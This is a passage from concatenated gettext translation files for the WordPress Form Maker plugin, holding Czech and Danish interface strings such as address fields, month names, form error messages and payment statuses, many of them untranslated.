"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Vyberte pole "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Vyberte datum"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-da_DK.po000060400000056645152434416630012160 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:52+0400\n"
"PO-Revision-Date: 2015-05-22 16:52+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: da\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Gade"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Gade Linje 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "By"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Stat / provins / region"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Postal / Zip Code"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Land"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Januar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Februar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Marts"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "April"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Maj"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Juni"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Juli"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "August"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "September"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Oktober"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "November"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "December"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Fejl, forkert sikkerhedskode kode."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "Din IP er sortlistet. Kontakt venligst hjemmesiden administrator. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Filen overskrider den tilladte størrelse"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Du har desværre ikke tilladelse til at uploade denne type fil."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Fejl, kan filen ikke kan flyttes."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Dette felt %s kræver en unik indgang, og denne værdi var allerede indsendt."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Fejl, blev e-mailen ikke sendt."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Intet blev fremlagt."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Din formular blev succesfuldt sendt."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Fejl, blev e-mailen ikke sendt."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Din e-mail-adresse er allerede bekræftet."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Din e-mail er blevet bekræftet."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Din e-mail verifikation er udløbet."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Bekræftelseslink er ugyldigt."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "felt er påkrævet."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Dette er ikke en gyldig e-mail-adresse."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Du kan ikke vælge tidligere datoer. Vælg en dato starter fra den nuværende."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "den "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "værdi skal være mellem "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "mængde "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Din score skal være mindre end "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Titel"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Første"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Sidste"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Mellemøsten"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Områdekode"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "telefonnummer. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "dollars "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "cents"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "fra "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "til"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "gå "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Nulstil "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Vælg et felt "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Vælg en dato"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

